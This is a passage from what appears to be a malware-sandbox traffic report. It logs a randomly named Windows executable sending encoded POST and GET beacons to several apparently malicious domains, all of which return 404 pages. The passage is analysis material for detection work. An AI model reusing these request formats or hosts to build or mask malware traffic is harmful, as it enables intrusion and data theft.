Accept-Language: en-US,en;q=0.9
Host: www.93wxd.top
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Oct 11, 2024 15:10:32.372220993 CEST | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Oct 2024 13:10:32 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 50002 | 85.159.66.93 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:10:37.611212969 CEST | 831 | OUT | POST /vd6t/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.meramhaliyikama.xyz
Origin: http://www.meramhaliyikama.xyz
Referer: http://www.meramhaliyikama.xyz/vd6t/
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Data Ascii: BHNhDJjp=aYKpj3OwPk4Aok0gX2Y8UzfFCaxHJYmOR04Dj8kft0nypWspz2HW6bawnFTQeBtuNg3mx/3tCRzawDjHnwocLDrfDhiwkY5MsU3vgi7Esm4Ue07lb9ZCZNaWwSsGtS13OaEWJ5GB4smp36eAEh5RSij0wQmiMESFe9VQmRVAyP2XfiUVzXA3fKCbbNw1M0/CckGinhY=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 50003 | 85.159.66.93 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:10:40.151999950 CEST | 851 | OUT | POST /vd6t/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.meramhaliyikama.xyz
Origin: http://www.meramhaliyikama.xyz
Referer: http://www.meramhaliyikama.xyz/vd6t/
Content-Length: 229
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Data Ascii: BHNhDJjp=aYKpj3OwPk4ApEkgUVw8czfKHaxHA4mKR0kDj9gptGDypykp8XHW5bawslTRThtlNg6Zx6ftCVbawBLHnjwbaDrdIBiI5I5MsU3vgivusmwUfEnlKotDRtaV5ysG6C08OaFFJ9Gn4pip37CAFw5QYij20QnnJ03eb/UbqDAnp+/pX05/p1IfMqujLe4CdEerGHWS52PXYPBobYOQdlEqgsCi/jGN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 50004 | 85.159.66.93 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:10:42.702403069 CEST | 1868 | OUT | POST /vd6t/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.meramhaliyikama.xyz
Origin: http://www.meramhaliyikama.xyz
Referer: http://www.meramhaliyikama.xyz/vd6t/
Content-Length: 1245
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 50005 | 85.159.66.93 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:10:45.294245958 CEST | 561 | OUT | GET /vd6t/?BHNhDJjp=XaiJgAiuFnMEtmZURD8Lc3raCMtFBuupNnQYn/g1mG/l0yZG2F7WlL2GsGHsclNHOTCW0P35DR3+uir5yxADGkXKDk67ta12miPg21T/nG4AWXn5T49Yc7XX4Q8eijQzNQ==&KteDo=fX0Hm8kxa HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.meramhaliyikama.xyz
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Oct 11, 2024 15:10:45.986139059 CEST | 225 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.1
Date: Fri, 11 Oct 2024 13:10:45 GMT
Content-Length: 0
Connection: close
X-Rate-Limit-Limit: 5s
X-Rate-Limit-Remaining: 19
X-Rate-Limit-Reset: 2024-10-11T13:10:50.8884704Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 50006 | 104.21.42.219 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:10:51.035074949 CEST | 816 | OUT | POST /bk4m/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.n-paylity.shop
Origin: http://www.n-paylity.shop
Referer: http://www.n-paylity.shop/bk4m/
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Data Ascii: BHNhDJjp=wcHeLpK9dMZ26jqbGj3gB/Y2cRosN6P+5QTwjTHMjagku1LqlcRtgv/wrSw/ceCXRvLrLiunw3pkwFEJzs/grzJgpbzGx6GZOtMka8F3nTEVhAfiRts5/ojaoMdXxMrweyctmIUbPhWXtnaEGonZQbTEfVdLVwp+qlo6yrC0EJNccOkT0nEqg59wA8vvE7mNZ0e9f70=
Oct 11, 2024 15:10:51.990077972 CEST | 876 | IN | HTTP/1.1 404 Not Found
Date: Fri, 11 Oct 2024 13:10:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: X_CACHE_KEY=77dc533e59e42f73c05af19411f726b6; path=/; Expires=Fri, 31-Dec-9999 23:59:59 GMT
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KqQkCZDZlqjotnVSli0SrhIBkyJZrfys%2Bg3CqZCbGlTLAeytGpF6twqYB6PxcP3pXVjxTnO%2BpDUZhLWZrRHOWbfwnF1Q%2FlbeId%2FgJhBDbhSZcLiPLZDh%2B2vXS1nbWi8AvyyUZA8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d0f17bb8f7e7c99-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
Data: [gzip-compressed chunked HTML body omitted: one 0xa7-byte chunk, then the terminating zero-length chunk received at 15:10:51.990888119 CEST (5 bytes IN)]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 50007 | 104.21.42.219 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:10:53.576061010 CEST | 836 | OUT | POST /bk4m/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.n-paylity.shop
Origin: http://www.n-paylity.shop
Referer: http://www.n-paylity.shop/bk4m/
Content-Length: 229
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Data Ascii: BHNhDJjp=wcHeLpK9dMZ25C6bJkDgJ/Y1TxosEaPi5QfwjSCTkoEkuXTq0ptttP/whyw6E+CcRvXJLmmnw39kwE0JzfnjrjJig7zI7aGZOtMka4tZnT8VixviA/E6j4jd/8dX7cr0eycbmJ50Pj+XtnKEF5nWbbSPR1clQAt7jlV06J32aLRjQYJ5uFMCzZRIQvnYVLHkDXONBsgRFKiwdvPoYMUEvN6D2yd2
Oct 11, 2024 15:10:54.548753977 CEST | 881 | IN | HTTP/1.1 404 Not Found
Date: Fri, 11 Oct 2024 13:10:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: X_CACHE_KEY=3f65d260df71e3f0c3e1a8bfc7229305; path=/; Expires=Fri, 31-Dec-9999 23:59:59 GMT
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ubVGFdSoGrzSt0lBmkYECZ%2Ba6kO3ciTerjsPku%2BMgGcQQ5L3DxR93lx8EQIwhBlweQzrBEJ5mROUxDiVtv%2FlyYagLwaT9j5DXx5UFLWebonVZi6Tb%2FhLnMVUu3QdBZclpPDZ%2B8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d0f17cb9942726f-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 50008 | 104.21.42.219 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:10:56.443002939 CEST | 1853 | OUT | POST /bk4m/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.n-paylity.shop
    Origin: http://www.n-paylity.shop
    Referer: http://www.n-paylity.shop/bk4m/
    Content-Length: 1245
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 77 63 48 65 4c 70 4b 39 64 4d 5a 32 35 43 36 62 4a 6b 44 67 4a 2f 59 31 54 78 6f 73 45 61 50 69 35 51 66 77 6a 53 43 54 6b 6f 4d 6b 76 6b 62 71 6c 2b 35 74 69 76 2f 77 36 79 77 37 45 2b 43 42 52 76 50 4e 4c 6d 72 61 77 31 46 6b 78 69 67 4a 78 75 6e 6a 2b 54 4a 69 74 62 7a 46 78 36 47 4d 4f 74 38 67 61 38 42 5a 6e 54 38 56 69 7a 33 69 41 74 73 36 77 49 6a 61 6f 4d 64 4c 78 4d 72 63 65 79 6b 4c 6d 4a 39 65 4f 54 65 58 74 44 57 45 41 4c 2f 57 53 62 53 4e 63 56 63 4c 51 42 51 72 6a 6d 77 46 36 4e 33 49 61 4a 52 6a 53 64 55 32 30 56 34 71 6f 62 39 43 41 73 76 70 50 50 4c 59 50 31 2b 4c 4e 39 59 5a 5a 4a 4f 6c 65 5a 36 75 53 64 70 42 34 37 47 4e 7a 56 35 33 6d 61 34 4e 35 50 45 30 55 43 78 53 4c 55 6b 57 73 59 6c 51 6d 38 58 38 70 48 64 33 38 71 52 76 6e 75 58 42 4c 49 35 61 4a 46 70 2f 38 79 4b 4e 77 64 68 6b 58 34 4e 67 58 33 55 63 73 4c 5a 4e 47 44 62 6a 59 31 59 39 6d 33 52 65 2f 55 68 33 54 70 51 49 32 68 42 61 42 79 53 53 44 51 55 75 2f 56 36 67 78 72 4d 76 79 51 73 54 33 [TRUNCATED]
    Data Ascii: BHNhDJjp= [TRUNCATED]
Oct 11, 2024 15:10:57.283760071 CEST | 881 | IN | HTTP/1.1 404 Not Found
    Date: Fri, 11 Oct 2024 13:10:57 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: X_CACHE_KEY=b694735f45275bfcb0c061e26b966d7d; path=/; Expires=Fri, 31-Dec-9999 23:59:59 GMT
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p23OAMjux1d1BeP4qe7H2m9MpW%2F5elJDZJymMssUdiIihXySIvOqBjGPFV%2B%2F%2B5FX3ecWHrAoDiBFouuQ9jo4X9hrJ6JNg4CK%2FAGwk6T6ULfzaVc6Rgml2QHeZT0SldST3YC0dXw%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d0f17dd4dc64331-EWR
    Content-Encoding: gzip
    alt-svc: h3=":443"; ma=86400
    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 50009 | 104.21.42.219 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:10:58.976104021 CEST | 556 | OUT | GET /bk4m/?BHNhDJjp=9ev+IdmnT8REph2CGzrIJ/IsR1IBIoPEgwjA7hGEn4o4y1K06O5g5/jYrWQAF7mhR86KKy+6wQgfy24A0MXqjVprhsrq1Iq/McMaN4BLomsWsjrPI4172Mamgtp349unMg==&KteDo=fX0Hm8kxa HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.n-paylity.shop
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Oct 11, 2024 15:10:59.855504990 CEST | 1236 | IN | HTTP/1.1 404 Not Found
    Date: Fri, 11 Oct 2024 13:10:59 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: X_CACHE_KEY=3be2390be999b7acd99030b3303a8b88; path=/; Expires=Fri, 31-Dec-9999 23:59:59 GMT
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SPA%2Fg4b%2F4N57VuXMR7ZZW0Ydh59DGZ9gtkgYS3va18%2B99wVCdc40HMqkFP%2FKBwLuHggSTJOoNM02kcjDfa9aZLqhPVA6eBBDv%2FO%2BkdTLcOWIzZk8jijMm103Sl9xZ8gu6i54%2B%2F0%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Speculation-Rules: "/cdn-cgi/speculation"
    Server: cloudflare
    CF-RAY: 8d0f17ed2d35191e-EWR
    alt-svc: h3=":443"; ma=86400
    Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disa
Oct 11, 2024 15:10:59.855571985 CEST | 52 | IN | Data Raw: 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ble MSIE and Chrome friendly error page -->0

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 50010 | 162.0.225.218 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:11:04.907160044 CEST | 804 | OUT | POST /ksch/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.supox.site
    Origin: http://www.supox.site
    Referer: http://www.supox.site/ksch/
    Content-Length: 209
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 45 2b 4e 54 54 74 2f 73 50 5a 32 4d 71 68 66 64 6d 37 4b 66 63 38 4d 58 5a 4f 32 6a 6a 62 42 32 55 6a 2b 55 46 50 6d 7a 73 42 4d 49 66 6c 76 49 4e 30 38 50 75 34 75 72 4c 4e 72 35 32 47 68 33 2f 2b 6b 6d 4c 41 43 76 4b 6f 62 5a 6d 6d 53 2f 2f 2b 71 69 74 57 4d 39 66 41 73 52 76 34 7a 4b 4c 45 72 67 30 33 33 5a 44 35 2b 52 4d 65 39 33 64 4f 2f 67 45 64 78 73 45 51 32 74 30 56 42 56 34 54 49 5a 65 69 76 45 47 77 4c 2b 59 53 42 2b 54 56 52 52 65 58 51 45 6f 35 37 70 51 32 2f 36 43 54 49 63 41 6d 68 4f 4c 4b 38 6a 62 66 53 4a 4e 77 2f 56 4c 75 56 4f 78 71 61 45 59 73 31 70 64 69 6e 4c 6a 64 51 3d
    Data Ascii: BHNhDJjp=E+NTTt/sPZ2Mqhfdm7Kfc8MXZO2jjbB2Uj+UFPmzsBMIflvIN08Pu4urLNr52Gh3/+kmLACvKobZmmS//+qitWM9fAsRv4zKLErg033ZD5+RMe93dO/gEdxsEQ2t0VBV4TIZeivEGwL+YSB+TVRReXQEo57pQ2/6CTIcAmhOLK8jbfSJNw/VLuVOxqaEYs1pdinLjdQ=
Oct 11, 2024 15:11:05.517242908 CEST | 533 | IN | HTTP/1.1 404 Not Found
    Date: Fri, 11 Oct 2024 13:11:05 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 50011 | 162.0.225.218 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:11:07.447925091 CEST | 824 | OUT | POST /ksch/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.supox.site
Origin: http://www.supox.site
Referer: http://www.supox.site/ksch/
Content-Length: 229
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Data Ascii: BHNhDJjp=E+NTTt/sPZ2MwAvdndCfX8MUWu2jq7ByUj6UFOT2s3cIGHnIDV8Pt4urfdrg4mhC/+guLBuvKszZmmC//MChtGM/UgsTr4zKLErg03znD4WRMtV3P//jO9xrFQ2twVBR4TIvejDiGyz+YSx+TBleXXQG1p6DfVnqAVMhBF1PKoIDXJ/jXS39YO52h5SzJcUAHB379KHqw3isyRZO6snpAfSMESVI
Oct 11, 2024 15:11:08.064826965 CEST | 533 | IN | HTTP/1.1 404 Not Found
Date: Fri, 11 Oct 2024 13:11:07 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 50012 | 162.0.225.218 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:11:09.996279001 CEST | 1841 | OUT | POST /ksch/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.supox.site
Origin: http://www.supox.site
Referer: http://www.supox.site/ksch/
Content-Length: 1245
